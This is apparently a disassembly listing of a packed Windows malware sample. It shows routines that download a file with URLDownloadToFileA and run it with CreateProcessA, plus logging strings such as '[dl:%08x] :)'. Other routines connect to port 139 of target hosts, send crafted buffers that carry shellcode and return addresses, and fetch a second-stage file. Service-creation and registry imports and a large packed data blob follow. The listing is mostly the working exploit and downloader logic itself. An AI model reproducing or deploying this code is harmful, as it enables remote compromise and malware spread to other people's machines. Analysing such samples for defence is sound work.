; ---------------------------------------------------------------------------
loc_60489C: ; CODE XREF: sub_60481B+7A�j
jmp short loc_604860
; ---------------------------------------------------------------------------
loc_60489E: ; CODE XREF: sub_60481B+5D�j
jmp short loc_604848
; ---------------------------------------------------------------------------
loc_6048A0: ; CODE XREF: sub_60481B+3D�j
xor eax, eax
locret_6048A2: ; CODE XREF: sub_60481B+25�j
; sub_60481B+7F�j
leave
retn 4
sub_60481B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6048A6 proc near ; CODE XREF: sub_6030CA+23B�p
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 218h
and [ebp+var_218], 0
mov eax, [ebp+arg_4]
mov [ebp+var_214], eax
mov eax, [ebp+arg_8]
mov [ebp+var_210], eax
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_20C]
push eax
call dword_6010CC ; lstrcpynA
lea eax, [ebp+var_108]
push eax
push 0
push offset dword_601D40
push offset a_ ; "."
call dword_601098 ; GetTempFileNameA
push 0
push 0
lea eax, [ebp+var_218]
push eax
push offset sub_60492B
push 0
push 0
call dword_6010C4 ; CreateThread
test eax, eax
jz short locret_604927
loc_604914: ; CODE XREF: sub_6048A6+7F�j
cmp [ebp+var_218], 0
jnz short locret_604927
push 8
call dword_6010E0 ; Sleep
jmp short loc_604914
; ---------------------------------------------------------------------------
locret_604927: ; CODE XREF: sub_6048A6+6C�j
; sub_6048A6+75�j
leave
retn 0Ch
sub_6048A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60492B proc near ; DATA XREF: sub_6048A6+5B�o
var_3AC = dword ptr -3ACh
var_3A8 = byte ptr -3A8h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = byte ptr -214h
var_110 = byte ptr -110h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3ACh
push offset aUrlmon_dll ; "urlmon.dll"
call dword_60106C ; LoadLibraryA
mov [ebp+var_224], eax
cmp [ebp+var_224], 0
jz short loc_60496E
push offset aUrldownloadtof ; "URLDownloadToFileA"
push [ebp+var_224]
call dword_601068 ; GetProcAddress
mov [ebp+var_3AC], eax
cmp [ebp+var_3AC], 0
jnz short loc_604975
loc_60496E: ; CODE XREF: sub_60492B+21�j
xor eax, eax
jmp locret_604ABD
; ---------------------------------------------------------------------------
loc_604975: ; CODE XREF: sub_60492B+41�j
push 214h
push [ebp+arg_0]
lea eax, [ebp+var_220]
push eax
call sub_6039D1
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
call dword_6010DC ; GetCurrentThreadId
mov [ebp+var_4], eax
cmp [ebp+var_218], 0
jnz short loc_6049D6
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_4]
push offset aDl08x_180sTo_1 ; "[dl:%08x] %.180s to %.180s"
lea eax, [ebp+var_3A8]
push eax
call dword_6010F4 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_3A8]
push eax
call sub_602CF3
loc_6049D6: ; CODE XREF: sub_60492B+77�j
push 0
push 0
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_214]
push eax
push 0
call [ebp+var_3AC]
test eax, eax
jnz loc_604A8E
push offset aD ; "d"
push offset dword_601680
push 0
push 0
push 28h
push 0
push 0
push 0
lea eax, [ebp+var_110]
push eax
push 0
call dword_6010B4 ; CreateProcessA
cmp eax, 1
jnz short loc_604A5F
cmp [ebp+var_218], 0
jnz short loc_604A4F
push [ebp+var_4]
push offset aDl08x ; "[dl:%08x] :)"
lea eax, [ebp+var_3A8]
push eax
call dword_6010F4 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_602CF3
loc_604A4F: ; CODE XREF: sub_60492B+FE�j
cmp [ebp+var_21C], 1
jnz short loc_604A5D
call sub_602804
loc_604A5D: ; CODE XREF: sub_60492B+12B�j
jmp short loc_604A8C
; ---------------------------------------------------------------------------
loc_604A5F: ; CODE XREF: sub_60492B+F5�j
cmp [ebp+var_218], 0
jnz short loc_604A8C
push [ebp+var_4]
push offset aDl08xExec ; "[dl:%08x] :( exec"
lea eax, [ebp+var_3A8]
push eax
call dword_6010F4 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_602CF3
loc_604A8C: ; CODE XREF: sub_60492B:loc_604A5D�j
; sub_60492B+13B�j
jmp short loc_604ABB
; ---------------------------------------------------------------------------
loc_604A8E: ; CODE XREF: sub_60492B+C7�j
cmp [ebp+var_218], 0
jnz short loc_604ABB
push [ebp+var_4]
push offset aDl08xDl ; "[dl:%08x] :( dl"
lea eax, [ebp+var_3A8]
push eax
call dword_6010F4 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_602CF3
loc_604ABB: ; CODE XREF: sub_60492B:loc_604A8C�j
; sub_60492B+16A�j
xor eax, eax
locret_604ABD: ; CODE XREF: sub_60492B+45�j
leave
retn 4
sub_60492B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_604AC1 proc near ; DATA XREF: sub_603C3B+2A9�o
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4Ch
push [ebp+arg_0]
call sub_604B25
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_604B1F
cmp dword_6016FC, 0
jnz short loc_604B1F
cmp [ebp+var_4], 1
jnz short loc_604AF0
mov [ebp+var_4C], offset dword_602610
jmp short loc_604AF7
; ---------------------------------------------------------------------------
loc_604AF0: ; CODE XREF: sub_604AC1+24�j
mov [ebp+var_4C], offset dword_60260C
loc_604AF7: ; CODE XREF: sub_604AC1+2D�j
push [ebp+var_4C]
push [ebp+arg_0]
call dword_601118 ; inet_ntoa
push eax
push offset dword_6025FC
lea eax, [ebp+var_48]
push eax
call dword_6010F4 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_48]
push eax
call sub_602CF3
loc_604B1F: ; CODE XREF: sub_604AC1+15�j
; sub_604AC1+1E�j
xor eax, eax
leave
retn 4
sub_604AC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_604B25 proc near ; CODE XREF: sub_604AC1+9�p
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_1C], 2
mov [ebp+var_1A], 8B00h
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
push 6
push 1
push 2
call dword_601124 ; socket
mov [ebp+var_8], eax
push 10h
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
call dword_60112C ; connect
push 48h
push offset unk_6020E0
push [ebp+var_8]
call sub_604C6A
push 89h
push offset dword_602130
push [ebp+var_8]
call sub_604C6A
push 0A8h
push offset dword_6021C0
push [ebp+var_8]
call sub_604C6A
push 0DEh
push offset dword_602270
push [ebp+var_8]
call sub_604C6A
mov [ebp+var_20], al
cmp [ebp+var_20], 30h
jz short loc_604BBA
cmp [ebp+var_20], 31h
jz short loc_604BB1
jmp short loc_604BC0
; ---------------------------------------------------------------------------
loc_604BB1: ; CODE XREF: sub_604B25+88�j
mov [ebp+var_C], 1
jmp short loc_604BD0
; ---------------------------------------------------------------------------
loc_604BBA: ; CODE XREF: sub_604B25+82�j
and [ebp+var_C], 0
jmp short loc_604BD0
; ---------------------------------------------------------------------------
loc_604BC0: ; CODE XREF: sub_604B25+8A�j
push [ebp+var_8]
call dword_601140 ; closesocket
xor eax, eax
jmp locret_604C66
; ---------------------------------------------------------------------------
loc_604BD0: ; CODE XREF: sub_604B25+93�j
; sub_604B25+99�j
push 3Eh
push offset dword_602350
push [ebp+var_8]
call sub_604C6A
push 60h
push offset dword_602390
push [ebp+var_8]
call sub_604C6A
push 0A0h
push offset dword_6023F8
push [ebp+var_8]
call sub_604C6A
call dword_6010B0 ; GetTickCount
and eax, 0FFFFh
mov word ptr [ebp+var_4], ax
cmp [ebp+var_C], 1
jnz short loc_604C22
push [ebp+var_4]
push [ebp+var_8]
call sub_604CA5
jmp short loc_604C2D
; ---------------------------------------------------------------------------
loc_604C22: ; CODE XREF: sub_604B25+EE�j
push [ebp+var_4]
push [ebp+var_8]
call sub_604D9C
loc_604C2D: ; CODE XREF: sub_604B25+FB�j
push 800h
call dword_6010E0 ; Sleep
push [ebp+var_8]
call dword_601140 ; closesocket
push [ebp+var_4]
push [ebp+arg_0]
call sub_604E6C
test eax, eax
jnz short loc_604C56
xor eax, eax
jmp short locret_604C66
; ---------------------------------------------------------------------------
jmp short locret_604C66
; ---------------------------------------------------------------------------
loc_604C56: ; CODE XREF: sub_604B25+129�j
cmp [ebp+var_C], 1
jnz short loc_604C63
xor eax, eax
inc eax
jmp short locret_604C66
; ---------------------------------------------------------------------------
jmp short locret_604C66
; ---------------------------------------------------------------------------
loc_604C63: ; CODE XREF: sub_604B25+135�j
push 2
pop eax
locret_604C66: ; CODE XREF: sub_604B25+A6�j
; sub_604B25+12D�j ...
leave
retn 4
sub_604B25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_604C6A proc near ; CODE XREF: sub_604B25+40�p
; sub_604B25+52�p ...
var_600 = byte ptr -600h
var_5BC = byte ptr -5BCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 600h
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_601130 ; send
push 0
push 600h
lea eax, [ebp+var_600]
push eax
push [ebp+arg_0]
call dword_60113C ; recv
mov al, [ebp+var_5BC]
leave
retn 0Ch
sub_604C6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_604CA5 proc near ; CODE XREF: sub_604B25+F6�p
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_2F2 = byte ptr -2F2h
var_2E = byte ptr -2Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 37Ch
push 86h
push offset dword_6024A0
lea eax, [ebp+var_378]
push eax
call sub_6039D1
lea eax, [ebp+var_2F2]
mov [ebp+var_4], eax
push dword_601F54
push offset sub_601F58
push [ebp+var_4]
call sub_6039D1
mov eax, [ebp+var_4]
mov cx, [ebp+arg_4]
mov [eax+100h], cx
push 41h
mov eax, 264h
sub eax, dword_601F54
add eax, 60h
push eax
mov eax, [ebp+var_4]
add eax, dword_601F54
push eax
call sub_6039A7
mov eax, [ebp+var_4]
add eax, 264h
mov [ebp+var_37C], eax
mov eax, [ebp+var_37C]
mov dword ptr [eax], 2080Ah
mov eax, [ebp+var_37C]
mov dword ptr [eax+0Ch], 20804h
mov eax, [ebp+var_37C]
mov dword ptr [eax+30h], 20804h
mov eax, [ebp+var_37C]
mov dword ptr [eax+3Ch], 20804h
push 20h
push offset dword_602528
lea eax, [ebp+var_2E]
push eax
call sub_6039D1
push 0
push 36Ah
lea eax, [ebp+var_378]
push eax
push [ebp+arg_0]
call dword_601130 ; send
push 400h
call dword_6010E0 ; Sleep
push 0
push 36Ah
lea eax, [ebp+var_378]
push eax
push [ebp+arg_0]
call dword_601130 ; send
leave
retn 8
sub_604CA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_604D9C proc near ; CODE XREF: sub_604B25+103�p
var_4DC = dword ptr -4DCh
var_4D8 = byte ptr -4D8h
var_452 = byte ptr -452h
var_2A = byte ptr -2Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4DCh
push 86h
push offset dword_602550
lea eax, [ebp+var_4D8]
push eax
call sub_6039D1
lea eax, [ebp+var_452]
mov [ebp+var_4DC], eax
push 90h
mov eax, 3E8h
sub eax, dword_601F50
push eax
push [ebp+var_4DC]
call sub_6039A7
mov eax, 3E8h
sub eax, dword_601F50
add eax, [ebp+var_4DC]
mov [ebp+var_4], eax
push dword_601F50
push offset sub_601DB8
push [ebp+var_4]
call sub_6039D1
mov eax, [ebp+var_4]
mov cx, [ebp+arg_4]
mov [eax+104h], cx
and [ebp+var_8], 0
jmp short loc_604E25
; ---------------------------------------------------------------------------
loc_604E1E: ; CODE XREF: sub_604D9C+A3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_604E25: ; CODE XREF: sub_604D9C+80�j
cmp [ebp+var_8], 10h
jnb short loc_604E41
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4DC]
mov dword ptr [ecx+eax*4+3E8h], 20804h
jmp short loc_604E1E
; ---------------------------------------------------------------------------
loc_604E41: ; CODE XREF: sub_604D9C+8D�j
push 20h
push offset dword_6025D8
lea eax, [ebp+var_2A]
push eax
call sub_6039D1
push 0
push 4CEh
lea eax, [ebp+var_4D8]
push eax
push [ebp+arg_0]
call dword_601130 ; send
leave
retn 8
sub_604D9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_604E6C proc near ; CODE XREF: sub_604B25+122�p
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_1C], 2
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
mov ax, [ebp+arg_4]
mov [ebp+var_1A], ax
push 6
push 1
push 2
call dword_601124 ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push eax
push [ebp+var_4]
call dword_60112C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_604EB6
push [ebp+var_4]
call dword_601140 ; closesocket
xor eax, eax
jmp short locret_604F00
; ---------------------------------------------------------------------------
loc_604EB6: ; CODE XREF: sub_604E6C+3B�j
push 0
push 8000080h
push 3
push 0
push 1
push 1
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
call dword_60109C ; CreateFileA
mov [ebp+var_8], eax
push 1
push 0
push 0
push 0
push 0
push [ebp+var_8]
push [ebp+var_4]
call sub_604F0A
mov [ebp+var_C], eax
push [ebp+var_8]
call dword_601070 ; CloseHandle
push [ebp+var_4]
call dword_601140 ; closesocket
mov eax, [ebp+var_C]
locret_604F00: ; CODE XREF: sub_604E6C+48�j
leave
retn 8
sub_604E6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_604F04 proc near ; CODE XREF: sub_603C3B+247�p
; sub_603C3B+261�p
jmp dword_601114
sub_604F04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_604F0A proc near ; CODE XREF: sub_604E6C+77�p
jmp dword_6010E8
sub_604F0A endp
; ---------------------------------------------------------------------------
dd 31Bh dup(0)
dd 10440000h, 454B0060h, 4C454E52h, 642E3233h, 80006C6Ch
dd 61657243h, 754D6574h, 41786574h, 65478000h, 73614C74h
dd 72724574h, 8000726Fh, 6E65704Fh, 6574754Dh, 80004178h
dd 61657243h, 65526574h, 65746F6Dh, 65726854h, 80006461h
dd 74697257h, 6F725065h, 73736563h, 6F6D654Dh, 80007972h
dd 74726956h, 416C6175h, 636F6C6Ch, 80007845h, 6C707544h
dd 74616369h, 6E614865h, 656C64h, 6C654480h, 46657465h
dd 41656C69h, 61578000h, 6F467469h, 6E695372h, 4F656C67h
dd 63656A62h, 47800074h, 72507465h, 6441636Fh, 73657264h
dd 4C800073h, 4C64616Fh, 61726269h, 417972h, 6F6C4380h
dd 61486573h, 656C646Eh, 65478000h, 69724474h, 79546576h
dd 416570h, 74736C80h, 6E656C72h, 47800041h, 6F4C7465h
dd 61636967h, 6972446Ch, 74536576h, 676E6972h, 80004173h
dd 646E6946h, 736F6C43h, 46800065h, 4E646E69h, 46747865h
dd 41656C69h, 69468000h, 6946646Eh, 46747372h, 41656C69h
dd 78458000h, 646E6170h, 69766E45h, 6D6E6F72h, 53746E65h
dd 6E697274h, 417367h, 6F6C4780h, 466C6162h, 656572h, 6F6C4780h
dd 416C6162h, 636F6C6Ch, 65478000h, 6D655474h, 6C694670h
dd 6D614E65h, 80004165h, 61657243h, 69466574h, 41656Ch
dd 74654780h, 72727543h, 50746E65h, 65636F72h, 80007373h
dd 57746547h, 6F646E69h, 69447377h, 74636572h, 4179726Fh
dd 6C5F8000h, 61657263h, 5F800074h, 6F6C636Ch, 80006573h
dd 54746547h, 436B6369h, 746E756Fh, 72438000h, 65746165h
dd 636F7250h, 41737365h, 736C8000h, 6D637274h, 80004170h
dd 65447349h, 67677562h, 72507265h, 6E657365h, 45800074h
dd 50746978h, 65636F72h, 80007373h, 61657243h, 68546574h
dd 64616572h, 65478000h, 646F4D74h, 46656C75h, 4E656C69h
dd 41656D61h, 736C8000h, 70637274h, 416E79h, 74654780h
dd 74737953h, 69446D65h, 74636572h, 4179726Fh, 65538000h
dd 6C694674h, 74744165h, 75626972h, 41736574h, 6F438000h
dd 69467970h, 41656Ch, 74654780h, 72727543h, 54746E65h
dd 61657268h, 644964h, 656C5380h, 0FF007065h, 0F0FFFFFFh
dd 55006010h, 33524553h, 6C642E32h, 4380006Ch, 55726168h
dd 72657070h, 77800041h, 69727073h, 4166746Eh, 0FFFFFF00h
dd 6010FCFFh, 32535700h, 2E32335Fh, 6C6C64h, 8000000h
dd 0E000000h, 41535780h, 74636F49h, 6Ch, 0
dd 900h, 700h, 9600h, 57800B00h, 6F534153h, 74656B63h
dd 41h, 3300h, 1600h, 1400h, 300h, 1200h, 500h, 1100h
dd 0F00h, 200h, 7200h, 100h, 0A00h, 0FFFF0C00h, 1000FFFFh
dd 44410060h, 49504156h, 642E3233h, 80006C6Ch
aStartservicect db 'StartServiceCtrlDispatcherA',0
aAopenservicea db '€OpenServiceA',0
aAopenscmanager db '€OpenSCManagerA',0
aAcloseserviceh db '€CloseServiceHandle',0
aAdeleteservice db '€DeleteService',0
aAsetservicesta db '€SetServiceStatus',0
aAregisterservi db '€RegisterServiceCtrlHandlerA',0
aAchangeservice db '€ChangeServiceConfigA',0
aAcontrolservic db '€ControlService',0
aAregclosekey db '€RegCloseKey',0
aAregsetvalueex db '€RegSetValueExA',0
aAregcreatekeya db '€RegCreateKeyA',0
aAsetsecurityin db '€SetSecurityInfo',0
aAchangeservi_0 db '€ChangeServiceConfig2A',0
aAstartservicea db '€StartServiceA',0
aAcreateservice db '€CreateServiceA',0
db 3 dup(0FFh)
dd 6010E8FFh, 57534D00h, 4B434F53h, 6C6C642Eh, 72548000h
dd 6D736E61h, 69467469h, 8000656Ch, 0
MEW ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
__u_____ segment para public 'BSS' use32
assume cs:__u_____
;org 606000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
dword_606000 dd 0FF41C933h, 0FFC91313h, 0C3F87213h, 7C801D77h, 7C80ADA0h
; DATA XREF: __u_____:00606018�o
dd 0
dd offset dword_606000
dd 60012Ch, 601750h, 601180h, 7501A75Dh, 70B60856h, 0AB2A235h
dd 1FE505A3h, 238D9A0Ah, 7180C3Ah, 9A65D37h, 0D93B534h
dd 45C380Ah, 52404D58h, 11634D3Dh, 82241A9h, 918544B5h
dd 0E901068Ah, 9F96411h, 94D948CDh, 55C41825h, 94D0C4Ah
dd 1008A75h, 601180BAh, 0D038B9E0h, 0E8387005h, 77FC410Fh
dd 991FC417h, 14680337h, 80140026h, 0E2425D32h, 870C2FAh
dd 730378EEh, 2E656F6Ch, 6B0E1D01h, 1E38A869h, 5D6A373Ch
dd 476E1C30h, 802B7332h, 38282E6Bh, 396D2F1Dh, 0A325278Fh
dd 1E3B3334h, 15A72C66h, 87E9207Ch, 6E2B7E80h, 3E246480h
dd 6F3F0A65h, 0F503433h, 2821303Ah, 5C6B6E39h, 0E5AB7108h
dd 770463Ch, 1D737C77h, 0C02A412Ch, 3E2B2E74h, 4EED3230h
dd 38730E0Ch, 0B21C5525h, 9739070Ah, 0E7DF32Ah, 0BA2BE43Dh
dd 106EF83Eh, 9F29EE2Ch, 0D9085D14h, 40BA3C32h, 0D73A2B37h
dd 1ABBFE3Bh, 0B7295A3Dh, 2457183Ah, 383B32A3h, 0B7C13134h
dd 45DA0E18h, 5E9E51CEh, 3E149873h, 5DF73529h, 0B8CF612h
dd 0FCE32D9Eh, 14AE7139h, 4FB6306Eh, 6FBF9D3Ah, 669274A8h
dd 67263F99h, 2D2B2428h, 0FFDFD718h, 39BC4494h, 6C1C08D0h
dd 0AE24788Bh, 0F44FDF6Fh, 2DDC0688h, 90831C31h, 397C32AEh
dd 41B7D2D1h, 5C68A1C3h, 2AAD3B9Bh, 0F285324Eh, 2022EF2Fh
dd 1E341307h, 9E04E916h, 0CA570F6Fh, 0F1FFD08h, 9F023114h
dd 3C0D39B0h, 6E11E30Eh, 0FC0176Fh, 0FE100B34h, 6C1FC61Ah
dd 6761D26Bh, 6D65690Eh, 17852FB8h, 34133412h, 71065A15h
dd 12154823h, 12B109AAh, 47BFC76Dh, 86F566Eh, 646903EBh
dd 2614990Ah, 13322810h, 40686251h, 70A6502Eh, 0FDE2014h
dd 9F4E0692h, 75CA193Eh, 74210C4Bh, 4EE18B28h, 92C416Ch
dd 0C7C833Fh, 0B5093408h, 6E1D1052h, 25146D1Dh, 0F90791Ch
dd 74242F48h, 421B3E49h, 7E88482Ch, 28303FF6h, 2D3E0C3Ah
dd 0F832482Fh, 7E31731Dh, 0C5412855h, 578F2A29h, 26322D01h
dd 30F25C3Ah, 0F420EDAh, 332A4917h, 3E7DD7D3h, 494146A8h
dd 226D3901h, 836ACF58h, 5D1C8228h, 918948BFh, 0FA4C901Fh
dd 34FB1A6Ah, 24A6626h, 0DEAE198Ch, 716F324Dh, 78B244F7h
dd 32263318h, 241A8629h, 128A0C61h, 2838C52Bh, 2D2A742Eh
dd 422D1B14h, 0E78FD098h, 2893BE5Fh, 0AD79C437h, 79BF827Bh
dd 343248FDh, 94362AC5h, 22102DACh, 8A436F61h, 0A824FE24h
dd 0FE6D011Bh, 0D932EE65h, 0B4319408h, 818A9438h, 0FEA4FD79h
dd 282FA1CEh, 0FF74DF02h, 4DB5D07Bh, 0AA5C8B6Dh, 6EC93E48h
dd 0A07B0824h, 5DEC9E20h, 28CD18A5h, 0B90681Ah, 7A22CEDBh
dd 657CAC5Dh, 3B302C39h, 559176E0h, 4D283314h, 36DC7D12h
dd 68EEF7ACh, 311B0C19h, 0F6D35D4h, 0AA1248F8h, 0E523631Eh
dd 3039190Dh, 77342DE8h, 9C89173h, 0AD2A3B06h, 72104998h
dd 6D98686Fh, 85690DC9h, 0D775D69h, 69011B68h, 0A109ADFFh
dd 779F1806h, 8F6A7F5Eh, 0DB7761F1h, 727DA1C7h, 2020620Ch
dd 777E3E14h, 9618B172h, 62600D18h, 0D62EEE18h, 90320576h
dd 1F6252DCh, 2E0BA873h, 8C0B903Eh, 73F9FF10h, 0B23616A6h
dd 28967E4Bh, 0E1C0D1Ch, 17A0486Bh, 294A394Ch, 28C4442Eh
dd 861F9FC6h, 33242B50h, 0A0EF240Ch, 2948F9D5h, 8C0D5612h
dd 62C5446h, 0D8806952h, 63702835h, 0FC810BAEh, 0DDD8597Fh
dd 0B24555Dh, 5C12671Ah, 0A3E79B64h, 92491018h, 562434A8h
dd 0AD9A3474h, 7DCA33CAh, 10A10A1Ah, 6019110Fh, 97A03310h
dd 978393Ch, 356C1B49h, 0F41F281Ch, 84A10AE5h, 0DC0301C8h
dd 97B2A299h, 5FB61931h, 7BB536C8h, 80E80A4h, 0D60A0B03h
dd 0A1457931h, 9DC6118h, 5E251F58h, 18175888h, 80F07D07h
dd 146FBE1Eh, 77C69DFh, 0A1A26EA8h, 67F19D30h, 5A290799h
dd 0F050929Ch, 66AFB6A5h, 49792106h, 0ED48BC28h, 51B13B03h
dd 41129016h, 5459667Eh, 52C7A898h, 6000302h, 0DC7919D4h
dd 0F67BA1Eh, 0DE177C55h, 9E039977h, 46D3703h, 0F944EB39h
dd 69E5106h, 83461E41h, 0B1DE5526h, 60C41073h, 45C8350Dh
dd 7949E8D4h, 14B7000Ah, 8BA2B5D7h, 28E85B37h, 0D48DDCFBh
dd 24591830h, 417ED786h, 511690B4h, 5313D304h, 946E01B1h
dd 0C943E43Bh, 0C284F40Ch, 0F96CD11Dh, 902183Bh, 7B85D654h
dd 44EB0A0Eh, 1B29BA45h, 24C1164Dh, 4511CA9Bh, 72563300h
dd 0C9511451h, 435FD15Ch, 0DF665552h, 0E18E502h, 0A9DD597Ah
dd 99D6C3BEh, 0DAFE4D37h, 0F9525560h, 839A2D47h, 17054631h
dd 0E7B673F0h, 20DA3132h, 0B8211061h, 84DB7214h, 0E710D63Eh
dd 8B20C8Fh, 0A1474045h, 81D680A3h, 0ECF392A3h, 0E35FFh
dd 0D84D082Fh, 5732239Dh, 159190Dh, 52B8B651h, 0BB804514h
dd 80471106h, 282C7BDAh, 26B0DE51h, 44D7A3C5h, 14C18D53h
dd 3DBD93B2h, 0CA4E5D08h, 92DF680Eh, 1C45A02Dh, 32F6A26Fh
dd 1D5E390Fh, 0A1E4DC6Dh, 0F0412D07h, 3552571h, 21FE9C26h
dd 0E5DD95Dh, 2D36857Eh, 0A51D841Dh, 2B813598h, 5A5D2191h
dd 0B2498B9Dh, 7DD7C828h, 1B163A1Eh, 0BB13189Ch, 0A03E0DEFh
dd 527D1A42h, 5D8D021Ch, 2B7FA44h, 1E5D0232h, 0ACBD848h
dd 0A2F1F10h, 955B0128h, 54A28A6Ch, 0FE3F07A3h, 1E0D185Fh
dd 0A09E27Dh, 160F121Eh, 1AECF43Dh, 10781CEEh, 6D736C19h
dd 13E51130h, 0B0645EBh, 3BCE163Dh, 319F2FAEh, 0DF3A3608h
dd 972D28F1h, 60C6E1Eh, 0C310513Ch, 6D056F48h, 0CF334A8Fh
dd 16792EBBh, 327D0937h, 0FD166D36h, 0F929754Bh, 0C82E1090h
dd 4D7F5E5Ah, 48DF5177h, 574C59C5h, 0A47D1532h, 0DD078906h
dd 9CA2FD34h, 0D570EA0h, 17CA0388h, 8ABD55DFh, 0F90A8F5Ch
dd 39FD334Ah, 2AFD32FDh, 77B22EFDh, 2A86DF2h, 7E91200Ah
dd 24685664h, 73683CF6h, 87F15310h, 55C4B05Eh, 1E87227Dh
dd 0C2C80A42h, 5C135E59h, 241B0529h, 0C8081A94h, 0FF5B791Dh
dd 0FF4D3394h, 4881202Ah, 15BDD5D7h, 103112FDh, 441624h
dd 0B9AF2737h, 0F2754114h, 29786D02h, 970E3A4Dh, 4867D9E6h
dd 238628E0h, 0E5C27D5Ch, 1B6D0257h, 0D28B762h, 325210BEh
dd 61140201h, 62FD792Ch, 65F80147h, 0FF400801h, 81551074h
dd 45D34059h, 3B8380CEh, 984BFA12h, 535CC217h, 5ECB275Fh
dd 0FD84D4ECh, 545E1A80h, 841FA8C9h, 67E10A85h, 0C128270Eh
dd 88784868h, 0D6812E9h, 15FA374Bh, 1CB40F8Fh, 297409E3h
dd 0C17BAFCCh, 146CF04h, 9F1450F9h, 54FD1809h, 56FC581Fh
dd 72715E6Dh, 0FBE5841Ch, 6CBA04AFh, 12950600h, 2D1F166Fh
dd 4FC08E4Bh, 0E21A0725h, 0D5BC2933h, 3B591CACh, 41B6D780h
dd 0B5C24C94h, 4D76D4A0h, 0CE3D152Bh, 0A8393BE5h, 0CD84104Ah
dd 6140065Eh, 124161C3h, 4EA2BD59h, 2917371Ch, 7EE7A84Ah
dd 410D01A2h, 0FDD71866h, 0B4A19E1Fh, 5925225Eh, 0D04208A7h
dd 0D9B51F7Ch, 0AA87A2A4h, 0CD3E0233h, 29A0869h, 263C3D8Ah
dd 0AC329658h, 0B0975659h, 15C95E1h, 0DD112194h, 289A0B59h
dd 0DA7AB014h, 59DD888Fh, 0C08835C7h, 0FEDC2FEEh, 5F484285h
dd 0A9B208B4h, 900D09D1h, 0BB63208h, 2F7396D8h, 37963806h
dd 74916F59h, 25083662h, 0D608002Dh, 4DE4DEB1h, 0AD7F38E6h
dd 0A9189A03h, 0BE3D75BDh, 9A56716h, 33B5F3A1h, 0AD288561h
dd 0CA074549h, 18D01868h, 31F3A20Dh, 0D81E8006h, 0B558289Dh
dd 54ABDD09h
dd 5922054Bh, 949D6E0Ch, 0C20C979Eh, 4A0DA162h, 0DC9F0D08h
dd 3DB0CDD5h, 0B4C31B5h, 8389530Eh, 0EF402DD8h, 5C6C350Dh
dd 6419922Dh, 49CFB14Ch, 31BC9335h, 0B6B3BD20h, 64649B3h
dd 3DEA47FBh, 8D3045D9h, 457D2016h, 0D125F48Ch, 0A9881ABCh
dd 0A599DE8Eh, 10327D37h, 0BA211289h, 41D65AB6h, 0BED41D86h
dd 0B920BE08h, 37789458h, 4854DD3Ah, 0C0852925h, 0B65F2983h
dd 49F02150h, 56B59361h, 30684422h, 4C4808D8h, 7591BF23h
